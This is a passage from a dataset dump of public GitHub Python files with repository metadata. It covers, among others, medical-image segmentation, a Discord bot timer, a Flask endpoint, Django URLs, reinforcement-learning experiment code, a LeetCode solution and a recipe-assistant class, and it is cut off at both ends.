select_good_deal(df_zoe_maj)\nexport_data_car(df_zoe_final)\n\nprint(df_zoe_final)\nprint(df_zoe.count())\nprint(df_zoe.corr())\n\n\n\n","repo_name":"SkatiRCI/starter-kit-datascience","sub_path":"westley-birmingham/Lesson4/exo_dom_lesson_4.py","file_name":"exo_dom_lesson_4.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"11679668939","text":"import numpy as np\nimport keras.backend as K\nimport keras\n\nSMOOTH = 0.001\n\n\n# Loss used to train the models (needed to load a keras model)\ndef real_dice_coef(y_true, y_pred):\n intersection = K.sum(y_true * y_pred, axis=(1, 2, 3))\n summation = K.sum(y_true, axis=(1, 2, 3)) + K.sum(y_pred, axis=(1, 2, 3))\n return K.mean((2. * intersection + SMOOTH) / (summation + SMOOTH))\n\n\ndef real_dice_coef_loss(y_true, y_pred):\n return - real_dice_coef(y_true, y_pred)\n\n\nkeras.losses.real_dice_coef_loss = real_dice_coef_loss\n\n\ndef get_mask(img, direction, model):\n \"\"\"\n For an input image of shape (384, 288, 384), apply a U-Net to each slice in direction X, Y or Z to output a mask\n with the same shape where the 1s represent the nodules detected by the Unet\n \"\"\"\n\n # Load model\n assert direction in ['X', 'Y', 'Z']\n\n # Parameters\n n_slices = 11 # The input of the U Net is not a single image but a volume of n_slices images\n smin = n_slices / 2\n smax = n_slices - smin\n axis1 = {'X': (0, 1), 'Y': (0, 2), 'Z': (1, 2)}[direction]\n axis2 = {'X': 2, 'Y': 1, 'Z': 0}[direction] # axis along we crop and select slices\n\n # We only extract masks on non empty slices located in the variable position\n sum_axis = np.sum(img, axis=axis1)\n inf = np.nonzero(sum_axis)[0][0]\n sup = img.shape[axis2] - np.nonzero(sum_axis[::-1])[0][0]\n inf = max(inf, smin)\n sup = min(sup, img.shape[axis2] - smax + 1)\n positions = np.arange(inf, sup, 1)\n mask = np.zeros(img.shape)\n\n for j, i in enumerate(positions):\n inputs = np.take(img, range(i - smin, i + smax), axis=axis2)\n inputs = np.rollaxis(inputs, axis2, 0)[None, None, :, :, :]\n if direction == 'X':\n mask[:, :, i] = model.predict(inputs)[0, 0]\n elif direction == 'Y':\n mask[:, i, :] = model.predict(inputs)[0, 0]\n elif direction == 'Z':\n mask[i, :, :] = model.predict(inputs)[0, 0]\n\n mask = (mask > 0.5).astype('int16')\n return mask\n","repo_name":"owkin/DSB2017","sub_path":"sje_scripts/nodule_segmentation.py","file_name":"nodule_segmentation.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} +{"seq_id":"8975489951","text":"# 布尔值\n\n# 数字\na = 5\nb = a == 5 # True\nb = a != 5 # False\nb = a > 2 # True\nb = a < 4 # False\n\n# 字符串\ns = 'abc'\nb = s == 'abc' # True\nb = s.find('a') >= 0 # 判断是否存在a,True\nb = s.find('e') > 0 # 判断是否存在e,False\nb = s.startswith('b') # 判断是否以b开头,False\nb = s.endswith('c') # 判断是否以c结尾,True\n\n# 运算\na = True\nb = False\nprint(a and b) # False\nprint(a or b) # True\nprint(not a) # False\n\nprint(a or b and (a or b) and not b)\n","repo_name":"lvancer/course_python","sub_path":"code/02/boolean.py","file_name":"boolean.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38678806039","text":"import json\nimport asyncio\nimport os\nimport datetime\n\nfrom systems.logger import log\nfrom systems.varmanager import VarManager\n\n\nclass FishingGearHandler:\n def __init__(self, client):\n self.client = client\n self.varmanager = VarManager()\n self.fishing_channels = None\n self.profiles_path = \"./local/fishing/profiles/\"\n self.items_file = \"./data/fishing/items.json\"\n self.profiles_list = []\n\n async def check_gear(self):\n await asyncio.sleep(10)\n self.fishing_channels = self.collect_channel_ids()\n log(f'[Fishing Gear Handler] - Starting profile searches')\n while self.client:\n current_time = datetime.datetime.now()\n three_hours_ago = current_time - datetime.timedelta(hours=3)\n self.find_profiles()\n for profile in self.profiles_list:\n user_id = profile.replace(\".json\", \"\")\n with open(f'{self.profiles_path}{profile}', \"r\") as f:\n profile_data = json.load(f)\n if not profile_data[\"gear\"]:\n continue\n for item in profile_data[\"gear\"]:\n if datetime.datetime.fromisoformat(item[1]) < three_hours_ago:\n # remove item from userprofile\n profile_data[\"gear\"].remove(item)\n self.write_json(f'{self.profiles_path}{profile}', profile_data)\n # reset item status in shop\n with open(f'{self.items_file}', \"r\") as f:\n items_dict = json.load(f)\n items_dict[item[0]][2] = True\n self.write_json(f'{self.items_file}', items_dict)\n # message fishing channels\n for channel in self.fishing_channels:\n ch = self.client.get_channel(channel)\n await ch.send(f'```yaml\\n\\nRent time expired on {item[0]} for'\n f' {self.get_user_name(user_id)}```')\n await asyncio.sleep(2)\n\n await asyncio.sleep(60)\n\n def write_json(self, filepath, data):\n with open(filepath, \"w\") as f:\n json.dump(data, f, indent=4)\n\n def find_profiles(self):\n self.profiles_list = []\n for root, dirs, files in os.walk(self.profiles_path):\n for file in files:\n self.profiles_list.append(file)\n\n def collect_channel_ids(self):\n if self.varmanager.read(\"fishing_channels\"):\n fishing_channels = self.varmanager.read(\"fishing_channels\")\n return fishing_channels\n\n def get_user_name(self, user_id):\n if os.path.exists(f'./data/etc/ids.json'):\n with open(f'./data/etc/ids.json', \"r\") as f:\n id_data = json.load(f)\n if str(user_id) in id_data:\n return id_data[str(user_id)]\n","repo_name":"matte54/ProjectReggie","sub_path":"tasks/fishing_gear_keeper.py","file_name":"fishing_gear_keeper.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12694218579","text":"import training as m\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n res = request.args.get('s')\n response = m.response(res)\n\n return jsonify({\n 'request': res,\n 'status': 200,\n 'response': response\n })\n","repo_name":"tech-talent-oaxaca/pnl-tensorflow-react","sub_path":"api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33948411609","text":"import pandas as pd\nimport plotly_express as px\nimport plotly.io as pio\nimport plotly.graph_objs as go\n\n\nfull_df = pd.read_csv(\"./csv/active_sellers_apr_19.csv\")\n\ndef set_plotly_template():\n layout = go.Layout(\n title='Figure Title',\n font = dict(size= 14, family='Roboto', color='white'),\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n showlegend=False,\n xaxis=dict(\n autorange=True,\n showgrid=False,\n ),\n yaxis=dict(\n autorange=True,\n showgrid=False,\n )\n )\n fig = go.Figure(layout=layout)\n templated_fig = pio.to_templated(fig)\n pio.templates['no_background'] = templated_fig.layout.template\n return 'no_background'\n\nclass BonanzaSellers:\n def __init__(self):\n self.df = pd.read_csv(\"./csv/active_sellers_apr_19.csv\")\n self.col_options = [dict(label=x, value=x) for x in self.df.columns]\n self.category_options = [dict(label=x, value=x) for x in self.df.featured_category_id.unique()]\n self.value_em = [\"minnow\", \"sea_bass\", \"dolphin\", \"whale\"]\n self.template = set_plotly_template()\n self.color_dict = { 'Computers/Tablets & Networking' : '#A6CEE3',\n 'Parts & Accessories' : '#1E78B4',\n 'Fashion' : '#B2DF8A',\n 'Jewelry & Watches' : '#329F2C',\n 'a' : '#FB9A99',\n 'Home & Garden' : '#E3191B',\n 'Sports Mem, Cards & Fan Shop' : '#FDBF6F',\n 'Sporting Goods' : '#FF7F00',\n 'Health & Beauty' : '#C9B2D6',\n 'b' : '#6B3D9A',\n 'Other' : '#FFFF99',}\n\n\n def min_max_norm(self, values):\n normalized = []\n minimum = min(values)\n maximum = max(values)\n for value in values:\n normalized.append((value-minimum)/(maximum-minimum))\n return normalized\n\n def sample_sized(self, df):\n size = min(df.groupby(['value_em']).value_em.count())\n dff = []\n for value in self.value_em:\n dff.append(df[df.value_em == value].sample(size))\n return pd.concat(dff)\n \n\n def value_em_profit(self, df1, df2):\n dff = pd.concat([df1, df2])\n return px.box(\n dff,\n color=\"featured_category_id\",\n y=\"value_em\",\n x=\"profit_estimate\",\n template=\"no_background\",\n points=False,\n log_x=True,\n orientation='h',\n notched=True,\n title='Profit by Seller Value' ,\n )\n\n def orders_items(self, df1, df2):\n dff = pd.concat([df1, df2])\n dff.amount = dff.amount.fillna(0)\n return px.scatter(\n dff,\n color=\"featured_category_id\",\n y=\"offers\",\n x=\"days_as_user\",\n size='amount',\n template=\"no_background\",\n color_discrete_map = self.color_dict,\n title='Orders for # of Items',\n )\n\n\n def __str__(self):\n return '{} - Category Stats'\n\n def __repr__(self):\n return '{self.__class__.__name__}({self.df})'.format(self==self)\n\n\n\nclass CategoryTableData:\n def __init__(self, df, value_em):\n self.dff = df[df.value_em==value_em]\n self.value_em = value_em\n self.count = self.dff.seller_id.count()\n self.winning = \"{:.1%}\".format(sum(self.dff.is_winning)/self.dff.seller_id.count())\n self.dps = '${:,.0f}'.format(self.dff.profit_estimate.sum()/self.dff.seller_id.count())\n self.median_dps = '${:,.0f}'.format(self.dff.profit_estimate.median())\n self.days_as_user = round(self.dff.days_as_user.mean())\n self.first_sale = round(self.dff.days_to_sale.dropna().mean())\n self.orders = round(self.dff.offers.mean())\n self.items = round(self.dff.item_count.mean())\n #self.membership = \"{:.0%}\".format(self.dff.membership.value_counts()[1]/self.dff.seller_id.count())\n\n def __str__(self):\n return '{} - Category Stats'.format(' '.join(self.dff.columns[1].split(\"_\")).title())\n\n def __repr__(self):\n return '{self.__class__.__name__}({self.category})'.format(self==self)\n\n\nclass Facts:\n def __init__(self, df1, df2):\n self.df1 = df1\n self.df2 = df2\n self.num_sellers1 = self.df1.seller_id.count()\n self.num_sellers_width1 = 100\n self.num_sellers2 = self.df2.seller_id.count()\n self.order_value1 = '${:,.0f}'.format(self.df1.order_value.mean())\n self.order_value2 = '${:,.0f}'.format(self.df2.order_value.mean())\n self.num_orders1 = round(self.df1.offers.mean())\n self.num_orders2 = round(self.df2.offers.mean())\n self.fvf_per_seller1 = '${:,.0f}'.format(self.df1.sum_fvf.mean())\n self.fvf_per_seller2 = '${:,.0f}'.format(self.df2.sum_fvf.mean())\n self.gmv_per_seller1 = '${:,.0f}'.format(self.df1.amount.mean())\n self.gmv_per_seller2 = '${:,.0f}'.format(self.df2.amount.mean())\n\n\n\n\n\nif __name__ == \"__main__\":\n print(set_plotly_template())\n print(list(pio.templates))\n # cs = CategoryTableData(full_df, 'sea_bass')\n # print(cs.winning)","repo_name":"bonanzakevin/data_analysis","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32068889775","text":"# -*- coding: utf -8 -*-\n\nvalue = int(input())\n\ndata = [100, 50, 20, 10, 5, 2, 1]\n\nprint(value)\n\nfor v in data:\n\tn = value / v\n\tvalue = value % v\n\tprint('%d nota(s) de R$ %d,00' % (n, v))","repo_name":"gustavobiage/Paradigmas---INE5416","sub_path":"Atividade_II1/Treino/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16622915159","text":"import pytest\nfrom team import BackEndDeveloper, FrontEndDeveloper, TeamLead, DevelopmentTeam\n\n\ndef test_back_end_developer_work():\n back_end_dev = BackEndDeveloper()\n back_end_dev.work()\n\n\ndef test_back_end_developer_get_salary():\n back_end_dev = BackEndDeveloper()\n back_end_dev.get_salary()\n\n\ndef test_front_end_developer_work():\n front_end_dev = FrontEndDeveloper()\n front_end_dev.work()\n\n\ndef test_front_end_developer_get_salary():\n front_end_dev = FrontEndDeveloper()\n front_end_dev.get_salary()\n\n\ndef test_team_lead_work():\n back_end_dev = BackEndDeveloper()\n front_end_dev1 = FrontEndDeveloper()\n front_end_dev2 = FrontEndDeveloper()\n team_lead = TeamLead([back_end_dev, front_end_dev1, front_end_dev2])\n\n team_lead.work()\n\n\ndef test_team_lead_get_salary():\n back_end_dev = BackEndDeveloper()\n front_end_dev1 = FrontEndDeveloper()\n front_end_dev2 = FrontEndDeveloper()\n team_lead = TeamLead([back_end_dev, front_end_dev1, front_end_dev2])\n\n team_lead.get_salary()\n\n\ndef test_development_team_work():\n back_end_dev = BackEndDeveloper()\n front_end_dev1 = FrontEndDeveloper()\n front_end_dev2 = FrontEndDeveloper()\n team_lead = TeamLead([back_end_dev, front_end_dev1, front_end_dev2])\n development_team = DevelopmentTeam()\n development_team.add_member(back_end_dev)\n development_team.add_member(front_end_dev1)\n development_team.add_member(front_end_dev2)\n development_team.add_member(team_lead)\n\n development_team.work()\n\n\ndef test_development_team_add_member():\n development_team = DevelopmentTeam()\n back_end_dev = BackEndDeveloper()\n development_team.add_member(back_end_dev)\n\n front_end_dev = FrontEndDeveloper()\n development_team.add_member(front_end_dev)\n","repo_name":"YouRockGarnov/Python-OOP","sub_path":"task5/test_team.py","file_name":"test_team.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71020716266","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n \n# Importar el Data set\ndataset = pd.read_csv(\"Aqui va el dataset de tu agrado\")\nX = dataset.iloc[:, :-1].values \ny = dataset.iloc[:, 3].values \n\n# Tratamiento de los NAs\nfrom sklearn.impute import SimpleImputer\nimputer = SimpleImputer(missing_values = np.nan, strategy = \"mean\", verbose=0)\nimputer = imputer.fit(X[:,1:3]) \nX[:, 1:3] = imputer.transform(X[:,1:3])\n\n#categoria = contiene un valor no numerico que sirve para clasificar a las columnas nos sirve para clasificar ejemplo \n#puede multiplicar 5x dato\n#--------------------------------------------------------------------------------------------------------\n# Codificar datos categoricos\nfrom sklearn.preprocessing import LabelEncoder , OneHotEncoder #clasificacion de variables dummy \nfrom sklearn.compose import ColumnTransformer\n\nlabelencoder_X = LabelEncoder()\nX[:, 0] = labelencoder_X.fit_transform(X[:, 0])\nct = ColumnTransformer(\n [('one_hot_encoder', OneHotEncoder(categories='auto'), [0])], \n remainder='passthrough' \n)\n\n\nX = np.array(ct.fit_transform(X), dtype=np.float)\nlabelencoder_y = LabelEncoder()\ny = labelencoder_y.fit_transform(y)\n#--------------------------------------------------------------------------------------------------------\n\n# Dividir el data set en conjunto de entrenamiento y en conjunto de testing\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size = 0.2, random_state = 0)\n\n# Escalado de variables\nfrom sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n","repo_name":"lfwzk/Terasoft.ec","sub_path":"template-preprocesado.py","file_name":"template-preprocesado.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72483605547","text":"\"\"\"NetworkBootManagementSystem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n# -*- coding:utf-8 -*-\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom networkbootsystem import views\n# 上传的文件能直接通过url打开,以及setting中设置\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.index, name='index'),\n url(r'^back_manage$', views.back_manage, name='back_manage'),\n\n url(r'^macupper$', views.mac_upper, name='macupper'), # MAC转换成大写\n\n # url(r'^$', 'login.viewss.login_view', name='login_view'),\n url(r'^boot$', views.boot_select, name='boot_select'),\n url(r'^select_boot_control.html', views.select_boot_control, name='select_boot_control'),\n url(r'^manage/', include('networkbootsystem.urls_iso'), name='manage_iso'),\n url(r'^manage/', include('networkbootsystem.urls_clonezilla'), name='manage_clonezilla'),\n\n\n # url(r'^pxelog/', include('networkbootsystem.urls_iso_log'), name='pxelog_iso'),\n\n url(r'^logs/', include('networkbootsystem.urls_clonezilla_log'), name='log_clonezilla'),\n url(r'^logs/', include('networkbootsystem.urls_iso_log'), name='log_iso'),\n url(r'^document$', views.document, name='document'),\n url(r'^complete_request$', views.complete_request, name='complete_request'),\n url(r'^start_request$', views.start_request, name='start_request'),\n\n url(r'^user/', include('networkbootsystem.urls_user'), name='manage_user'),\n\n url(r'^update_logs$', views.update_logs, name='update_logs'),\n url(r'^get_new_version$', views.get_new_version, name='get_new_version'),\n\n url(r'^computer/', include('networkbootsystem.urls_computer_info'), name='computer'),\n\n url(r'^other/', include('networkbootsystem.urls_batfile'), name='other'),\n\n url(r'^show_current_select_boot$', views.show_current_select_boot, name='show_current_select_boot'),\n\n url(r'^schedule/', include('networkbootsystem.urls_schedule')),\n url(r'^questionbank/', include('networkbootsystem.urls_questionbank')),\n\n]\n\n# 上传的文件能直接通过url打开\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"istarmeow/NetworkBootManagementSystem","sub_path":"NetworkBootManagementSystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39687093362","text":"import webbrowser\r\n\r\nclass Movie():\r\n \"\"\" This class stores movie information such as title, poster image, youtube trailer \"\"\"\r\n # class constructor\r\n def __init__(\r\n self, movie_title,\r\n poster_image_url,\r\n trailer_youtube_url\r\n ):\r\n # instance variables\r\n self.title = movie_title\r\n self.poster_image_url = poster_image_url\r\n self.trailer_youtube_url = trailer_youtube_url\r\n\r\n\r\n \r\n","repo_name":"swatisuman0690/my-movie-trailer-website","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379321067","text":"import csv\n\nfrom absl import logging\nfrom tensorflow.compat.v1.io import gfile\n\n\ndef _ema(base, val, decay=0.995):\n return base * decay + (1 - decay) * val\n\n\ndef run(env, agent, num_episodes, report_every=200, num_eval_reps=1):\n \"\"\"Runs an agent on an environment.\n\n Args:\n env: The environment.\n agent: The agent.\n num_episodes: Number of episodes to train for.\n report_every: Frequency at which training progress are reported (episodes).\n num_eval_reps: Number of eval episodes to run per training episode.\n\n Returns:\n A list of dicts containing training and evaluation returns, and a list of\n reported returns smoothed by EMA.\n \"\"\"\n\n returns = []\n logged_returns = []\n train_return_ema = 0.\n eval_return_ema = 0.\n for episode in range(num_episodes):\n returns.append(dict(episode=episode))\n\n # Run a training episode.\n train_episode_return = run_episode(env, agent, is_training=True)\n train_return_ema = _ema(train_return_ema, train_episode_return)\n returns[-1][\"train\"] = train_episode_return\n\n # Run an evaluation episode.\n returns[-1][\"eval\"] = []\n for _ in range(num_eval_reps):\n eval_episode_return = run_episode(env, agent, is_training=False)\n eval_return_ema = _ema(eval_return_ema, eval_episode_return)\n returns[-1][\"eval\"].append(eval_episode_return)\n\n if ((episode + 1) % report_every) == 0 or episode == 0:\n logged_returns.append(\n dict(episode=episode, train=train_return_ema, eval=[eval_return_ema]))\n logging.info(\"Episode %s, avg train return %.3f, avg eval return %.3f\",\n episode + 1, train_return_ema, eval_return_ema)\n if hasattr(agent, \"get_logs\"):\n logging.info(\"Episode %s, agent logs: %s\", episode + 1,\n agent.get_logs())\n\n return returns, logged_returns\n\n\ndef run_episode(environment, agent, is_training=False):\n \"\"\"Run a single episode.\"\"\"\n\n timestep = environment.reset()\n\n while not timestep.last():\n action = agent.step(timestep, is_training)\n new_timestep = environment.step(action)\n\n if is_training:\n agent.update(timestep, action, new_timestep)\n\n timestep = new_timestep\n\n episode_return = environment.episode_return\n\n return episode_return\n\n\ndef write_returns_to_file(path, returns):\n \"\"\"Write returns to file.\"\"\"\n\n with gfile.GFile(path, \"w\") as file:\n writer = csv.writer(file, delimiter=\" \", quoting=csv.QUOTE_MINIMAL)\n writer.writerow([\"episode\", \"train\"] +\n [f\"eval_{idx}\" for idx in range(len(returns[0][\"eval\"]))])\n for row in returns:\n writer.writerow([row[\"episode\"], row[\"train\"]] + row[\"eval\"])\n","repo_name":"deepmind/deepmind-research","sub_path":"option_keyboard/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"21150074704","text":"from collections import deque\n\n\nclass Solution:\n def shortestDistance(self, grid: List[List[int]]) -> int:\n # Complexity: O(|NUM_BUILDINGS| * i * j)\n self.code = lambda x: x[0] * len(grid[0]) + x[1]\n self.num_locations = 0\n self.num_buildings = 0\n self.visitable_by = [[0 for j in range(len(grid[0]))] for i in range(len(grid))]\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 0:\n self.num_locations += 1\n elif grid[i][j] == 1:\n self.num_buildings += 1\n\n grid[i][j] = -grid[i][j]\n\n\n if self.num_locations == 0:\n return -1\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == -1:\n self.bfs(grid, i, j)\n\n # print(grid)\n ret = 100000\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] >= 0 and self.visitable_by[i][j] == self.num_buildings:\n ret = min(grid[i][j], ret)\n\n if ret == 100000:\n return -1\n return ret\n\n\n def bfs(self, grid: List[List[int]], i: int, j: int) -> int:\n queue = deque()\n queue.append((i, j, 0))\n visited = set()\n visited.add(self.code((i, j)))\n\n while len(queue) > 0:\n r, c, level = queue.popleft()\n new_level = level + 1\n\n if r > 0 and grid[r - 1][c] >= 0:\n code = self.code((r - 1, c))\n if code not in visited:\n grid[r - 1][c] = grid[r - 1][c] + new_level\n queue.append((r - 1, c, new_level))\n visited.add(code)\n self.visitable_by[r - 1][c] += 1\n\n\n if r < len(grid) - 1 and grid[r + 1][c] >= 0:\n code = self.code((r + 1, c))\n if code not in visited:\n grid[r + 1][c] = grid[r + 1][c] + new_level\n queue.append((r + 1, c, new_level))\n visited.add(code)\n self.visitable_by[r + 1][c] += 1\n\n\n if c > 0 and grid[r][c - 1] >= 0:\n code = self.code((r, c - 1))\n if code not in visited:\n grid[r][c - 1] = grid[r][c - 1] + new_level\n queue.append((r, c - 1, new_level))\n visited.add(code)\n self.visitable_by[r][c - 1] += 1\n\n if c < len(grid[0]) - 1 and grid[r][c + 1] >= 0:\n code = self.code((r, c + 1))\n if code not in visited:\n grid[r][c + 1] = grid[r][c + 1] + new_level\n queue.append((r, c + 1, new_level))\n visited.add(code)\n self.visitable_by[r][c + 1] += 1\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/317. Shortest Distance from All Buildings/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"16300306057","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\n\ndef plot_run(results, standalone=True):\n if standalone:\n plt.subplots(figsize=(15, 15))\n\n plt.subplot(3, 3, 1)\n plt.title('Position Graph')\n plt.plot(results['time'], results['x'], label='x')\n plt.plot(results['time'], results['y'], label='y')\n plt.plot(results['time'], results['z'], label='z')\n plt.xlabel('time, seconds')\n plt.ylabel('Position')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 2)\n plt.title('Velocity Graph')\n plt.plot(results['time'], results['x_velocity'], label='x')\n plt.plot(results['time'], results['y_velocity'], label='y')\n plt.plot(results['time'], results['z_velocity'], label='z')\n plt.xlabel('time, seconds')\n plt.ylabel('Velocity')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 3)\n plt.title('Orientation Graph')\n plt.plot(results['time'], results['phi'], label='phi')\n plt.plot(results['time'], results['theta'], label='theta')\n plt.plot(results['time'], results['psi'], label='psi')\n plt.xlabel('time, seconds')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 4)\n plt.title('Angular Velocity Graph')\n plt.plot(results['time'], results['phi_velocity'], label='phi')\n plt.plot(results['time'], results['theta_velocity'], label='theta')\n plt.plot(results['time'], results['psi_velocity'], label='psi')\n plt.xlabel('time, seconds')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 5)\n plt.title('Rotor Speed Graph')\n plt.plot(results['time'], results['rotor_speed1'], label='Rotor 1')\n plt.plot(results['time'], results['rotor_speed2'], label='Rotor 2')\n plt.plot(results['time'], results['rotor_speed3'], label='Rotor 3')\n plt.plot(results['time'], results['rotor_speed4'], label='Rotor 4')\n plt.xlabel('time, seconds')\n plt.ylabel('Rotor Speed, revolutions / second')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 6)\n plt.title('Reward Graph')\n plt.plot(results['time'], results['reward'], label='Reward')\n plt.xlabel('time, seconds')\n plt.ylabel('Reward')\n if standalone:\n plt.legend(loc=3)\n ax2 = plt.twinx()\n ax2.plot(results['time'], np.cumsum(results['reward']), color='xkcd:red', label='Accum. Reward')\n ax2.set_ylabel('Accumulated Reward')\n if standalone:\n ax2.legend(loc=4)\n plt.grid(True)\n\n if standalone:\n plt.tight_layout()\n plt.show()\n\nclass SetupPlot():\n def __init__(self, fileName,task):\n # Setup\n self.labels = ['time', 'x', 'y', 'z', 'phi', 'theta', 'psi', 'x_velocity',\n 'y_velocity', 'z_velocity', 'phi_velocity', 'theta_velocity',\n 'psi_velocity', 'rotor_speed1', 'rotor_speed2', 'rotor_speed3', 'rotor_speed4','reward']\n self.results = {x : [] for x in self.labels}\n self.task=task\n self.fileName=fileName\n # Run the simulation, and save the results.\n with open(self.fileName, 'w') as csvfile:\n self.writer = csv.writer(csvfile)\n self.writer.writerow(self.labels)\n def writeResults(self,reward,action):\n action=list(action)*4\n with open(self.fileName, 'a') as csvfile:\n self.writer = csv.writer(csvfile)\n to_write = [self.task.sim.time] + list(self.task.sim.pose) + list(self.task.sim.v) + list(self.task.sim.angular_v) + list(action)+[reward]\n for ii in range(len(self.labels)):\n self.results[self.labels[ii]].append(to_write[ii])\n self.writer.writerow(to_write)\n return self.results","repo_name":"CheloGE/MachineLearningProjects","sub_path":"RL-Quadcopter-2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22722277652","text":"from sys import stdin\r\n\r\nn = int(stdin.readline().strip(\"\\n\"))\r\n\r\nexp = stdin.readline().strip(\"\\n\")\r\n\r\n\r\ndef compute(a, b, op):\r\n if op == '+':\r\n return a + b\r\n elif op == '-':\r\n return a - b\r\n elif op == '*':\r\n return a * b\r\n elif op == '/':\r\n return a / b\r\n\r\n\r\nstack = []\r\ntemp = []\r\nfor i in range(n):\r\n temp.append(int(stdin.readline()))\r\n\r\nfor i in exp:\r\n if i != '*' and i != '/' and i != '-' and i != '+':\r\n stack.append(temp[ord(i)-65])\r\n else:\r\n b = stack.pop()\r\n a = stack.pop()\r\n c = compute(a, b, i)\r\n stack.append(c)\r\n\r\nprint(\"{0:.2f}\".format(stack.pop()))\r\n","repo_name":"student079/Algorithm","sub_path":"후위 표기식2_백준1935.py","file_name":"후위 표기식2_백준1935.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23954674150","text":"from utils.loggerX import Logger\nfrom utils.prompt_factory import PromptFactory\n\nlogger = Logger(__name__)\n\nclass RecipeAssistant:\n def __init__(self, settings, recommendation_model, recipe_model, recommendation_parser, recipe_parser, recommendation_prompt_template, recipe_prompt_template):\n self.settings = settings\n self.reccomendation_model = recommendation_model\n self.recipe_model = recipe_model\n self.recommendation_parser = recommendation_parser\n self.recipe_parser = recipe_parser\n self.prompt_factory = PromptFactory(self.settings)\n self.recommendation_prompt = recommendation_prompt_template\n self.recipe_prompt = recipe_prompt_template\n\n def execute_recommendation_prompt(self, prompt_template, query):\n formatted_prompt = prompt_template.format_prompt(query=query)\n output = self.reccomendation_model(formatted_prompt.to_string())\n return output\n \n def execute_recipe_prompt(self, prompt_template, query):\n formatted_prompt = prompt_template.format_prompt(query=query)\n output = self.recipe_model(formatted_prompt.to_string())\n return output \n\n def get_recommendation(self, day):\n rec_query = self.prompt_factory.create_recommendation_prompt()\n rec_output = self.execute_recommendation_prompt(self.recommendation_prompt, rec_query)\n recommendation = self.recommendation_parser.parse(rec_output)\n return recommendation\n\n def get_recipe(self, recommendation):\n ing_query = self.prompt_factory.create_recipe_information_template(recommendation)\n ing_output = self.execute_recipe_prompt(self.recipe_prompt, ing_query)\n recipe = self.recipe_parser.parse(ing_output)\n return 